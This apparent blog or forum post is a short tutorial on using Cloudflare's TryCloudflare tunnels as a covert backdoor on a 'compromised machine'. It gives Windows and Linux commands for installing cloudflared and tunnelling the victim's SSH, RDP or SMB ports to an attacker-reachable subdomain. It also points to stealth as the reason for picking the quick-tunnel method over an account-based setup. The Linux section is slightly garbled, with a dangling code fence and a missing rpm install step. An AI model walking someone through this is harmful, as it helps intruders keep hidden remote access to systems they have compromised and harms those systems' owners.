CloudFlare Tunnels, a widely used feature in the CloudFlare arsenal, empowers users to establish secure outbound connections to the CloudFlare network for their web servers or applications.
The process is streamlined—you can set up a tunnel with ease by installing the cloudflared client, available for Linux, Windows, macOS, and Docker platforms.
Once configured, the service becomes accessible on the internet via a user-defined hostname, catering to legitimate scenarios like resource sharing and testing. You can set this tunnel up to stealthy connect to the victims SSH, RDP, and SMB servers.
With just one command from the victim's device, revealing nothing more than the attacker's distinctive tunnel token, a discrete communication channel can be effortlessly established. Simultaneously, you can gain the ability to dynamically adjust a tunnel's configuration, toggling its status between disabled and enabled in real-time as per their requirements.
How to setup and use TryCloudFlare tunnels
Windows
- Download and install
cloudflared
on the compromised Windows machine via winget:winget install --id Cloudflare.cloudflared
- Rename download to
cloudflared.exe
. OPTIONAL: Movecloudflared.exe
to where you want it to sit. - Open up Powershell and navigate to where
cloudflared.exe
is before running the following command. Replace PORT with the port you want to tunnel to:cloudflared.exe tunnel localhost:PORT
Linux
-
You will need to download the appropriate .deb (Debian, Ubuntu, Mint) or .rpm (RHEL, Fedora, CentOS) files to the compromised machine beblow:
Installing cloudflared with
.deb
:wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb dpkg -i cloudflared-linux-amd64.deb
Installing cloudflared with
.rpm
:wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-x86_64.rpm ```bash
-
Once completed you can create a tunnel by using the following command. Replace PORT with the port you want to tunnel to:
cloudflared tunnel localhost:PORT
Accessing The Tunnel
After executing cloudflared
it will generate a random subdomain on trycloudflare.com
that points to the compromised machine and its selected PORT
. You can now use the selected application (ssh, smb, rdp) that corresponds with the port to connect to your new subdomain.
If you're having trouble with getting TryCloudFlare
to work then it might be best to setup a CloudFlare account and obtain a domain name. You can then go into CloudFlare's "Zero Trust" section and start assigning the tunnels. There is more flexibility in doing it this way, however it is less stealthy and a few more steps since you will need to get a domain name and assign it.
Member discussion: